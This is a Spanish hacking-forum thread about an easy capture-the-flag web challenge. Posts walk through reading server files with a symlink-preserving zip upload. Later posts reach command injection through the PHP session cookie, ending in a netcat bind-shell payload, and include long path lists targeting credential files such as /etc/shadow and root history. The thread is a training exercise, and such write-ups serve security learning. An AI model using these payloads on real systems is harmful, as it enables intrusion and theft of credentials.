This site uses cookies own and third. If you continue to browse consider to accept the use of cookies. OK More Info.

Mini Reto explotación web [Fácil]

  • 10 Replies
  • 9059 Views

0 Members and 1 Guest are viewing this topic.

Offline Jimeno

  • *
  • Ex-Staff
  • *****
  • Posts: 367
  • Actividad:
    0%
  • Reputación -1
  • NULL
  • Twitter: "><<img src=y onerror=prompt();>
    • View Profile
    • Twitter

Mini Reto explotación web [Fácil]

  • on: April 28, 2016, 05:20:19 pm
Buenas.

Os dejo un pequeño reto de explotación web.
Objetivo: enviar por MP a @You are not allowed to view links. Register or Login el contenido del fichero /banana/secret.lst
Podéis leerlo y dar por finalizado el reto o continuar con la explotación, es probable que podáis conseguir ser root :)
URL: You are not allowed to view links. Register or Login


Un saludo.
Contacto: @migueljimeno96 -

Offline Jimeno

  • *
  • Ex-Staff
  • *****
  • Posts: 367
  • Actividad:
    0%
  • Reputación -1
  • NULL
  • Twitter: "><<img src=y onerror=prompt();>
    • View Profile
    • Twitter

Re:Mini Reto explotación web [Fácil]

  • on: May 04, 2016, 06:50:58 pm
Buenas.

Como han pasado ya unos días desde que lo publiqué y no me han llegado soluciones válidas dejo la respuesta a la parte de conseguir leer el fichero:

Al abrir la web nos encontramos con un uploader. Tras probar muchas extensiones podremos ver que se trata de un whitelist que únicamente admite ficheros .zip.
Si subimos un fichero ZIP con una carpeta, por ejemplo, veremos que obtenemos la siguiente salida:

Code: (bash) You are not allowed to view links. Register or Login
cat: /tmp/vv89ts6vpptuiju8odh5844j95/gifwebshells: Is a directory
Por lo que podemos suponer que hace un unzip y, tras ello, un cat a los contenidos obtenidos. Para asegurarnos podemos subir un ZIP que contiene un fichero de texto:
¡PREMIO!
Code: (html5) You are not allowed to view links. Register or Login
<!DOCTYPE html5>
<head>
<meta charset="utf-8"/>
<title>Sube tu archivo aquí</title>
</head>

<body>
<form action="?page=upload" method="post" enctype="multipart/form-data">
<input type="file" name="file"/>
<input type="submit" value="kuankear!"/>
</form>



Contenido del ZIP:<br>Hola, Underc[0]de


</body>
</html>

Ahora solamente nos queda conseguir leer ficheros internos... ¿parece difícil?
Si revisamos la documentación de zip veremos que se permite conservar los symlinks You are not allowed to view links. Register or Login al crear un fichero ZIP. Por lo que podremos aprovecharlo para leer un fichero interno...



Pero... mejor vamos paso a paso:
Code: (bash) You are not allowed to view links. Register or Login
ln -s /banana/secret.lst prueba1
Esta línea crea un fichero nuevo llamado "prueba1" que queda enlazado con el fichero que deseamos leer (el cual ahora mismo no poseemos)[/li]
[li]
Code: (bash) You are not allowed to view links. Register or Login
zip --symlinks prueba1.zip prueba1
    Esta otra línea crea el fichero ZIP que utilizaremos para "atacar" y leer el fichero gracias a que conservamos los enlaces simbólicos...[/li]

Por último quedaría subir el fichero:
Code: (html5) You are not allowed to view links. Register or Login
<!DOCTYPE html5>
<head>
<meta charset="utf-8"/>
<title>Sube tu archivo aquí</title>
</head>

<body>
<form action="?page=upload" method="post" enctype="multipart/form-data">
<input type="file" name="file"/>
<input type="submit" value="kuankear!"/>
</form>



Contenido del ZIP:<br>underc0de{resolviste_el_reto_enhorabuena}


</body>
</html>


Hemos obtenido el contenido del fichero: underc0de{resolviste_el_reto_enhorabuena}

* algunos del staff hablaron conmigo sobre la explotación de este tipo de fallos en un entorno real, Facebook mismamente fue vulnerable: You are not allowed to view links. Register or Login

Podéis probarlo por vosotros mismos, dejaré el servidor activo unos días.
PD: sí, se pueden leer ficheros como /etc/passwd y otros (:
¡Saludos!
Contacto: @migueljimeno96 -

Offline DeBobiPro

  • *
  • Ex-Staff
  • *****
  • Posts: 328
  • Actividad:
    0%
  • Reputación 6
  • Como no sabía que era imposible, lo hice.
    • View Profile

Re:Mini Reto explotación web [Fácil]

  • on: May 04, 2016, 06:56:59 pm
Probado y funciona!

No tenía idea de los symlinks con ZIP .

Agradecido !

Saludos!
Nivel 77 You are not allowed to view links. Register or Login

Offline blackdrake

  • *
  • Co Admin
  • Posts: 2006
  • Actividad:
    0%
  • Country: es
  • Reputación 23
    • View Profile

Re:Mini Reto explotación web [Fácil]

  • on: May 05, 2016, 05:40:54 am
Muy buen reto!!, la verdad es, que nunca se me ocurrió pensar en los symlinks y me quedé atascado pensando como podía ejecutar código al subir el .zip, pues subiendo un txt te mostraba su contenido.



Offline Jimeno

  • *
  • Ex-Staff
  • *****
  • Posts: 367
  • Actividad:
    0%
  • Reputación -1
  • NULL
  • Twitter: &quot;&gt;&lt;&lt;img src=y onerror=prompt();&gt;
    • View Profile
    • Twitter

Re:Mini Reto explotación web [Fácil]

  • on: May 05, 2016, 11:42:09 am
En unos días libero la solución de ejecutar comandos remotamente y lo elimino :)
Contacto: @migueljimeno96 -

Offline seth

  • *
  • Underc0der
  • Posts: 264
  • Actividad:
    0%
  • Reputación 2
    • View Profile

Re:Mini Reto explotación web [Fácil]

  • on: May 08, 2016, 10:05:10 pm
Quote
Firefox can't establish a connection to the server at 52.58.126.85.


edit: consegui ejecutar codigo pero en local, tendria que provar en el servidor
« Last Edit: May 08, 2016, 10:22:31 pm by seth »

Offline blackdrake

  • *
  • Co Admin
  • Posts: 2006
  • Actividad:
    0%
  • Country: es
  • Reputación 23
    • View Profile

Re:Mini Reto explotación web [Fácil]

  • on: May 09, 2016, 08:12:59 am
You are not allowed to view links. Register or Login
Quote
Firefox can't establish a connection to the server at 52.58.126.85.


edit: consegui ejecutar codigo pero en local, tendria que provar en el servidor

Me temo que el reto ya no está disponible.

Saludos.


Offline seth

  • *
  • Underc0der
  • Posts: 264
  • Actividad:
    0%
  • Reputación 2
    • View Profile

Re:Mini Reto explotación web [Fácil]

  • on: May 09, 2016, 06:55:51 pm
Entonces puedo postear la que creo que es la solucion y como llegué hasta ahi?

Offline rollth

  • *
  • Ex-Staff
  • *****
  • Posts: 889
  • Actividad:
    0%
  • Reputación 16
  • El conocimiento es libre.
  • Twitter: @RoloMijan
    • View Profile
    • Whateversec
    • Email

Re:Mini Reto explotación web [Fácil]

  • on: May 09, 2016, 07:05:49 pm
You are not allowed to view links. Register or Login
Entonces puedo postear la que creo que es la solucion y como llegué hasta ahi?

La solución está posteada, pero si has encontrado un camino alternativo, adelante :D

Rollth
Buen hacker mejor persona.
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

Offline seth

  • *
  • Underc0der
  • Posts: 264
  • Actividad:
    0%
  • Reputación 2
    • View Profile

Re:Mini Reto explotación web [Fácil]

  • on: May 09, 2016, 09:07:20 pm
Yo no resolvi la primer parte, lei el post que explicaba como leer archivos y jugue a conseguir ejecucion de codigo

Primero me hice un script para tratar de conseguir mas información. El objetivo era conseguir archivos de configuracion, principalmente para sacar el path del php que maneja las subidas. Mi idea era por un lado, leer el codigo para ver como funcionaba, y por el otro ver si se podia hacer que los archivos descompriman en la carpeta de la web y subir una shell.


Code: You are not allowed to view links. Register or Login
<?PHP
$a = file_get_contents("httpd-conf-locations.txt");

$i=300;
foreach(explode("\n", $a) as $line){
    system('ln -s "'.$line.'" prueba'.$i++);
}

El txt es este:
Code: You are not allowed to view links. Register or Login
/etc/apache/conf/httpd.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/http/conf/httpd.conf
/etc/http/httpd.conf
/etc/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/opt/apache/conf/httpd.conf
/opt/apache2/conf/httpd.conf
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf.default
/usr/apache/conf/httpd.conf
/usr/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/usr/local/apache/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/httpd.conf
/usr/local/apps/apache/conf/httpd.conf
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/httpd/conf/httpd.conf
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.php
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/var/www/conf/httpd.conf
c:\Program Files\Apache Group\Apache2\conf\httpd.conf
c:\Program Files\Apache Group\Apache\conf\httpd.conf
c:\Program Files\xampp\apache\conf\httpd.conf
C:/Program Files/Apache Software Foundation/Apache2.2/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/pkg/etc/httpd/httpd.conf
/usr/local/etc/apache22/httpd.conf
/usr/local/etc/apache2/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/conf.d/apache2
/opt/lampp/etc/httpd.conf
Despues:
Code: You are not allowed to view links. Register or Login
zip --symlinks prueba1.zip prueba*
Ahi me aparecio el archivo de configuracion de apache y saque que la carpeta es /var/www
Ya me habia imaginado que era esa la carpeta, pero buscaba el archivo en /var/www/index.php

Volvi a correr el script con otro txt:
Code: You are not allowed to view links. Register or Login
/apache/logs/access.log
/apache/logs/error.log
/apache2/logs/access.log
/apache2/logs/error.log
/bin/php.ini
/etc/apache/conf/httpd.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/cgi-bin
/etc/chrootUsers
/etc/ftpchroot
/etc/ftphosts
/etc/group
/etc/http/conf/httpd.conf
/etc/http/httpd.conf
/etc/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/logs/acces.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/access.log
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error_log
/etc/httpd/php.ini
/etc/logrotate.d/ftp
/etc/logrotate.d/proftpd
/etc/logrotate.d/vsftpd.log
/etc/mail/access
/etc/my.cnf
/etc/mysql/my.cnf
/etc/passwd
/etc/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/etc/php/cgi/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php5/cgi/php.ini
/etc/proftp.conf
/etc/proftpd/modules.conf
/etc/protpd/proftpd.conf
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/pureftpd.pdb
/etc/pureftpd.passwd
/etc/pureftpd.pdb
/etc/security/environ
/etc/security/failedlogin
/etc/security/group
/etc/security/lastlog
/etc/security/limits
/etc/security/passwd
/etc/security/user
/etc/shadow
/etc/utmp
/etc/vhcs2/proftpd/proftpd.conf
/etc/vsftpd.chroot_list
/etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/wtmp
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers
/logs/access.log
/logs/error.log
/logs/pure-ftpd.log
/opt/apache/conf/httpd.conf
/opt/apache2/conf/httpd.conf
/opt/lampp/logs/access.log
/opt/lampp/logs/access_log
/opt/lampp/logs/access_log
/opt/lampp/logs/error.log
/opt/lampp/logs/error_log
/opt/lampp/logs/error_log
/opt/xampp/etc/php.ini
/opt/xampp/logs/access.log
/opt/xampp/logs/access_log
/opt/xampp/logs/error.log
/opt/xampp/logs/error_log
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf.default
/root/.Xauthority
/root/.bash_history
/root/.bash_logut
/root/.ksh_history
/usr/apache/conf/httpd.conf
/usr/apache2/conf/httpd.conf
/usr/etc/pure-ftpd.conf
/usr/lib/cron/log
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/lib/security/mkuser.default
/usr/local/Zend/etc/php.ini
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/php.ini
/usr/local/apache/httpd.conf
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access. log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_ log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error_log
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/httpd.conf
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/error.log
/usr/local/apache2/logs/error_log
/usr/local/apps/apache/conf/httpd.conf
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/cpanel/logs
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache/vhosts.conf
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/httpd/conf/httpd.conf
/usr/local/lib/php.ini
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.php
/usr/local/php/lib/php.ini
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php4/lib/php.ini
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/usr/local/php5/lib/php.ini
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/thttpd_log
/usr/pkgsrc/net/pureftpd/
/usr/ports/contrib/pure-ftpd/
/usr/ports/ftp/pure-ftpd/
/usr/ports/net/pure-ftpd/
/usr/sbin/pure-config.pl
/usr/spool/lp/log
/usr/spool/mqueue/syslog
/var/adm
/var/adm/SYSLOG
/var/adm/X0msgs
/var/adm/acct/sum/loginlog
/var/adm/aculog
/var/adm/aculogs
/var/adm/crash/unix
/var/adm/crash/vmcore
/var/adm/cron/log
/var/adm/dtmp
/var/adm/lastlog/username
/var/adm/log/asppp.log
/var/adm/log/xferlog
/var/adm/loginlog
/var/adm/lp/lpd-errs
/var/adm/messages
/var/adm/pacct
/var/adm/qacct
/var/adm/ras/bootlog
/var/adm/ras/errlog
/var/adm/sulog
/var/adm/utmp
/var/adm/utmpx
/var/adm/vold.log
/var/adm/wtmp
/var/adm/wtmpx
/var/apache/log
/var/apache/log
/var/apache/logs
/var/apache/logs
/var/apache/logs/access_log
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/apache/logs/error_log
/var/cpanel/cpanel.config
/var/cron/log
/var/lib/mysql/my.cnf
/var/local/www/conf/php.ini
/var/lock/samba
/var/log
/var/log/POPlog
/var/log/access.log
/var/log/access_log
/var/log/access_log
/var/log/acct
/var/log/apache-ssl/access.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/apache-ssl/error.log
/var/log/apache/access.log
/var/log/apache/access.log
/var/log/apache/access_log
/var/log/apache/access_log
/var/log/apache/error.log
/var/log/apache/error.log
/var/log/apache/error_log
/var/log/apache/error_log
/var/log/apache2/access.log
/var/log/apache2/access_log
/var/log/apache2/error.log
/var/log/apache2/error_log
/var/log/auth
/var/log/auth.log
/var/log/authlog
/var/log/boot.log
/var/log/cron.log
/var/log/error.log
/var/log/error_log
/var/log/error_log
/var/log/exim/mainlog
/var/log/exim/paniclog
/var/log/exim/rejectlog
/var/log/exim_mainlog
/var/log/exim_paniclog
/var/log/exim_rejectlog
/var/log/ftp-proxy
/var/log/ftp-proxy/ftp-proxy.log
/var/log/ftplog
/var/log/httpd/
/var/log/httpd/access.log
/var/log/httpd/access_log
/var/log/httpd/access_log
/var/log/httpd/error.log
/var/log/httpd/error_log
/var/log/httpd/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/kern.log
/var/log/lastlog
/var/log/lighttpd
/var/log/maillog
/var/log/message
/var/log/messages
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql-slow.log
/var/log/mysql/mysql.log
/var/log/mysqld.log
/var/log/mysqlderror.log
/var/log/ncftpd.errs
/var/log/ncftpd/misclog.txt
/var/log/news
/var/log/news.all
/var/log/news/news
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
/var/log/poplog
/var/log/proftpd
/var/log/proftpd.access_log
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/proftpd/xferlog.legacy
/var/log/pure-ftpd/pure-ftpd.log
/var/log/pureftpd.log
/var/log/qmail
/var/log/qmail/
/var/log/samba
/var/log/samba-log.%m
/var/log/secure
/var/log/smtpd
/var/log/spooler
/var/log/syslog
/var/log/telnetd
/var/log/thttpd_log
/var/log/utmp
/var/log/vsftpd.log
/var/log/wtmp
/var/log/xferlog
/var/log/yum.log
/var/lp/logs/lpNet
/var/lp/logs/lpsched
/var/lp/logs/requests
/var/mysql.log
/var/run/utmp
/var/saf/_log
/var/saf/port/log
/var/spool/errors
/var/spool/locks
/var/spool/logs
/var/spool/tmp
/var/www/conf/httpd.conf
/var/www/log/access_log
/var/www/log/access_log
/var/www/log/error_log
/var/www/log/error_log
/var/www/logs/access.log
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error.log
/var/www/logs/error_log
/var/www/logs/error_log
/web/conf/php.ini
/www/logs/proftpd.system.log
c:\NetServer\bin\stable\apache\php.ini
c:\PHP\php.ini
c:\Program Files\Apache Group\Apache2\conf\httpd.conf
c:\Program Files\Apache Group\Apache\conf\httpd.conf
c:\Program Files\Apache Group\Apache\logs\access.log
c:\Program Files\Apache Group\Apache\logs\access.log
c:\Program Files\Apache Group\Apache\logs\error.log
c:\Program Files\Apache Group\Apache\logs\error.log
c:\Program Files\xampp\apache\conf\httpd.conf
c:\WINDOWS\php.ini
c:\WINNT\php.ini
c:\apache\logs\access.log
c:\apache\logs\access.log
c:\apache\logs\error.log
c:\apache\logs\error.log
c:\apache\php\php.ini
c:\home2\bin\stable\apache\php.ini
c:\home\bin\stable\apache\php.ini
c:\php4\php.ini
c:\php5\php.ini
c:\php\php.ini
c:\xampp\apache\bin\php.ini
Ahi vi algunos archivos mas y me di cuenta de que era un ubuntu. Tambien me di cuenta de que no habia ninguna configuracion loca, el archivo php.ini estaba como cualquier otro, habian pocos usuarios, el usuario del webserver era www-data y cosas asi. Pregunté y me dijeron que en ubuntu tenia que buscar en /var/www/html/index.php

Ahi consegui el source:
Code: You are not allowed to view links. Register or Login
ln -s "/var/www/html/index.php" prueba54
zip --symlinks prueba1.zip prueba54

Code: You are not allowed to view links. Register or Login
<!DOCTYPE html5>
<head>
    <meta charset="utf-8"/>
    <title>Sube tu archivo aquí</title>
</head>

<body>
    <form action="?page=upload" method="post" enctype="multipart/form-data">
        <input type="file" name="file"/>
        <input type="submit" value="kuankear!"/>
    </form>


<?php
    session_start
();
    
$allowed = array('zip');
    
$filename $_FILES['file']['name'];
    
$ext pathinfo($filenamePATHINFO_EXTENSION);
    if (!
in_array($ext$allowed)) {
        die(
"La extensión del archivo no es admisible.");
    }
    
$tmp_file "/tmp/" session_id();
    
$zip = new ZipArchive;
    
$zip->open($_FILES['file']['name']);
    
$zip->extractTo($tmp_file);
    
exec('unzip -o ' $_FILES['file']['tmp_name'] . ' -d ' $tmp_file);
    echo 
"Contenido del ZIP:<br>";
    
passthru("cat $tmp_file/* 2>&1");
    
exec("rm -rf $tmp_file");
    
?>



</body>
</html>

Ahi me di cuenta de algo que podria haber visto mucho antes: cuando tiraba errores tipo "cat: /tmp/asdasdasdasdqwe: No such file or directory", el nombre del archivo venia del id de sesion (la cookie PHPSESSID)

La parte importante:
Code: You are not allowed to view links. Register or Login
    session_start();
    $tmp_file = "/tmp/" . session_id();
    passthru("cat $tmp_file/* 2>&1");

Con exec() tambien se ejecutan los comandos, pero con passthru() vemos la salida
Seteo la cookie a esto:
Quote
0g4clkinm90tfeukeferus7en0asd$(id)
Y entre un monton de errores se ve esto:

Code: You are not allowed to view links. Register or Login
Contenido del ZIP:<br>cat: /tmp/0g4clkinm90tfeukeferus7en0asduid=33(http): Is a directory
cat: gid=33(http): No such file or directory
cat: groups=33(http)/*: No such file or directory

Trate de correr nc y wget pero no podia porque si ponia un espacio en la cookie, php generaba otra
Use esto: You are not allowed to view links. Register or Login
Me quedó esta cookie:
Code: You are not allowed to view links. Register or Login
qur0v0rjnj840jju8qn1qpdjd3q$({nc,-lp,8989,-e,/bin/bash})Y ahi me pude conectar a una shell remota

A partir de la parte donde consigo el codigo php, todas las pruebas son locales porque desaparecio el servidor. Es probable que en el servidor no me pueda conectar asi, pero sirve la misma tecnica para hacer una conexion inversa o para bajar una webshell con wget


Me diverti bastante, me gustó que no haya que adivinar cosas

Offline Jimeno

  • *
  • Ex-Staff
  • *****
  • Posts: 367
  • Actividad:
    0%
  • Reputación -1
  • NULL
  • Twitter: &quot;&gt;&lt;&lt;img src=y onerror=prompt();&gt;
    • View Profile
    • Twitter

Re:Mini Reto explotación web [Fácil]

  • on: May 10, 2016, 08:02:34 am
Enhorabuena @You are not allowed to view links. Register or Login, tú y JKS conseguisteis esa, la solución esperada. Hiciste un gran trabajo :)

Espero sacar más retos pronto

Un saludo y gracias por participar.

You are not allowed to view links. Register or Login
Yo no resolvi la primer parte, lei el post que explicaba como leer archivos y jugue a conseguir ejecucion de codigo

Primero me hice un script para tratar de conseguir mas información. El objetivo era conseguir archivos de configuracion, principalmente para sacar el path del php que maneja las subidas. Mi idea era por un lado, leer el codigo para ver como funcionaba, y por el otro ver si se podia hacer que los archivos descompriman en la carpeta de la web y subir una shell.


Code: You are not allowed to view links. Register or Login
<?PHP
$a = file_get_contents("httpd-conf-locations.txt");

$i=300;
foreach(explode("\n", $a) as $line){
    system('ln -s "'.$line.'" prueba'.$i++);
}

El txt es este:
Code: You are not allowed to view links. Register or Login
/etc/apache/conf/httpd.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/http/conf/httpd.conf
/etc/http/httpd.conf
/etc/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/opt/apache/conf/httpd.conf
/opt/apache2/conf/httpd.conf
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf.default
/usr/apache/conf/httpd.conf
/usr/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/usr/local/apache/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/httpd.conf
/usr/local/apps/apache/conf/httpd.conf
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/httpd/conf/httpd.conf
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.php
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/var/www/conf/httpd.conf
c:\Program Files\Apache Group\Apache2\conf\httpd.conf
c:\Program Files\Apache Group\Apache\conf\httpd.conf
c:\Program Files\xampp\apache\conf\httpd.conf
C:/Program Files/Apache Software Foundation/Apache2.2/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/pkg/etc/httpd/httpd.conf
/usr/local/etc/apache22/httpd.conf
/usr/local/etc/apache2/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/conf.d/apache2
/opt/lampp/etc/httpd.conf
Despues:
Code: You are not allowed to view links. Register or Login
zip --symlinks prueba1.zip prueba*
Ahi me aparecio el archivo de configuracion de apache y saque que la carpeta es /var/www
Ya me habia imaginado que era esa la carpeta, pero buscaba el archivo en /var/www/index.php

Volvi a correr el script con otro txt:
Code: You are not allowed to view links. Register or Login
/apache/logs/access.log
/apache/logs/error.log
/apache2/logs/access.log
/apache2/logs/error.log
/bin/php.ini
/etc/apache/conf/httpd.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/httpd.conf
/etc/cgi-bin
/etc/chrootUsers
/etc/ftpchroot
/etc/ftphosts
/etc/group
/etc/http/conf/httpd.conf
/etc/http/httpd.conf
/etc/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/logs/acces.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/access.log
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error_log
/etc/httpd/php.ini
/etc/logrotate.d/ftp
/etc/logrotate.d/proftpd
/etc/logrotate.d/vsftpd.log
/etc/mail/access
/etc/my.cnf
/etc/mysql/my.cnf
/etc/passwd
/etc/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/etc/php/cgi/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php4/cgi/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php5/cgi/php.ini
/etc/proftp.conf
/etc/proftpd/modules.conf
/etc/protpd/proftpd.conf
/etc/pure-ftpd/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pure-ftpd/pureftpd.pdb
/etc/pureftpd.passwd
/etc/pureftpd.pdb
/etc/security/environ
/etc/security/failedlogin
/etc/security/group
/etc/security/lastlog
/etc/security/limits
/etc/security/passwd
/etc/security/user
/etc/shadow
/etc/utmp
/etc/vhcs2/proftpd/proftpd.conf
/etc/vsftpd.chroot_list
/etc/vsftpd.conf
/etc/vsftpd/vsftpd.conf
/etc/wtmp
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers
/logs/access.log
/logs/error.log
/logs/pure-ftpd.log
/opt/apache/conf/httpd.conf
/opt/apache2/conf/httpd.conf
/opt/lampp/logs/access.log
/opt/lampp/logs/access_log
/opt/lampp/logs/access_log
/opt/lampp/logs/error.log
/opt/lampp/logs/error_log
/opt/lampp/logs/error_log
/opt/xampp/etc/php.ini
/opt/xampp/logs/access.log
/opt/xampp/logs/access_log
/opt/xampp/logs/error.log
/opt/xampp/logs/error_log
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf.default
/root/.Xauthority
/root/.bash_history
/root/.bash_logut
/root/.ksh_history
/usr/apache/conf/httpd.conf
/usr/apache2/conf/httpd.conf
/usr/etc/pure-ftpd.conf
/usr/lib/cron/log
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/lib/security/mkuser.default
/usr/local/Zend/etc/php.ini
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/php.ini
/usr/local/apache/httpd.conf
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access. log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_ log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error_log
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/httpd.conf
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/error.log
/usr/local/apache2/logs/error_log
/usr/local/apps/apache/conf/httpd.conf
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/cpanel/logs
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache/vhosts.conf
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/httpd/conf/httpd.conf
/usr/local/lib/php.ini
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.php
/usr/local/php/lib/php.ini
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php4/lib/php.ini
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/usr/local/php5/lib/php.ini
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/thttpd_log
/usr/pkgsrc/net/pureftpd/
/usr/ports/contrib/pure-ftpd/
/usr/ports/ftp/pure-ftpd/
/usr/ports/net/pure-ftpd/
/usr/sbin/pure-config.pl
/usr/spool/lp/log
/usr/spool/mqueue/syslog
/var/adm
/var/adm/SYSLOG
/var/adm/X0msgs
/var/adm/acct/sum/loginlog
/var/adm/aculog
/var/adm/aculogs
/var/adm/crash/unix
/var/adm/crash/vmcore
/var/adm/cron/log
/var/adm/dtmp
/var/adm/lastlog/username
/var/adm/log/asppp.log
/var/adm/log/xferlog
